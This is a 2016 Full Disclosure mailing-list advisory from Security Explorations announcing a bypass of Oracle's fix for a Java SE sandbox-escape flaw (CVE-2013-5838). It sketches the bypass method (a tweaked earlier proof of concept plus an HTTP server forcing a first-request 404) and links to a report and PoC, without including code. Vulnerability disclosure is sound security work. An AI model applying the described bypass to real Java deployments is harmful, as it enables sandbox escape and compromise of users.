[FD] [SE-2012-01] Broken security fix in Oracle Java SE 7/8/9

2016-03-09 Thread Security Explorations 


Hello All,

On Mar 07, 2016 Security Explorations modified its Disclosure Policy [1].
As a result, we do not tolerate broken fixes any more. If an instance
of a broken fix for a vulnerability we already reported to the vendor
is encountered, it gets disclosed by us without any prior notice.

The vendor that gets the questionable honor to be the first to experience
our modified Disclosure Policy is Oracle.

Yesterday, during my JavaLand talk [2], while discussing the problems
related to Java platform security, its ecosystem and vendors I disclosed
general information about a broken Oracle Java SE fix from Sep 2013:

http://www.security-explorations.com/materials/se-javaland.pdf

This was the fix for the last vulnerability we reported to the company
as part of our Java SE security research (Issue 69 [3]). This weakness
made it possible to implement a very classic attack against JVM (class
spoofing attack).

According to Oracle, the vulnerability was addressed by a backported
(from JDK 8) implementation of the affected component (method handles
API) in JDK 7 Update 40 from Sep 2013.

We however found out that Oracle patch could be trivially bypassed with
the use of the following:
- four character change to our original POC code published in Oct 2013,
- a custom HTTP server enforcing "404 (Not Found)" error when requesting
  a given class for the first time.

Full technical details of Oracle fix bypass can be found in our technical
report:

http://www.security-explorations.com/materials/SE-2012-01-ORACLE-14.pdf

Along with the report, we have also published a Proof of Concept code to
illustrate the broken fix:

http://www.security-explorations.com/materials/se-2012-01-69.2.zip

The POC was successfully verified in the environment of Java SE 7 Update
97, Java SE 8 Update 74 and Java SE 9 Early Access Build 108. A complete
Java security escape could be achieved with it.

Please, note that the published material neither constitutes the bypass
of Java security levels, nor its Click2Play functionality. It's a mere
Java security sandbox escape.

At the end, it's worth to note that beside breaking a fix for Issue 69
(CVE-2013-5838), Oracle also improperly evaluated its impact. Oracle
Critical Patch Update from Oct 2013 indicated that Issue 69 could "be
exploited only through sandboxed Java Web Start applications and sandboxed
Java applets". This is not true. We verified that it could be successfully
exploited in a server environment as well such as Google App Engine for
Java [4].

Thank you.

--
Best Regards,
Adam Gowdiak

-
Security Explorations
http://www.security-explorations.com
"We bring security research to the new level"
-

References:
[1] Disclosure Policy
http://www.security-explorations.com/en/disclosure-policy.html
[2] JavaLand conference, "Java (in)security" talk
http://www.javaland.eu/en/javaland-2016/
[3] SE-2012-01-ORACLE-13, Issue 69
http://www.security-explorations.com/materials/SE-2012-01-ORACLE-13.pdf
[4] SE-2014-02, Issue21 (POC23)
http://www.security-explorations.com/materials/se-2014-02-32-34.zip


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/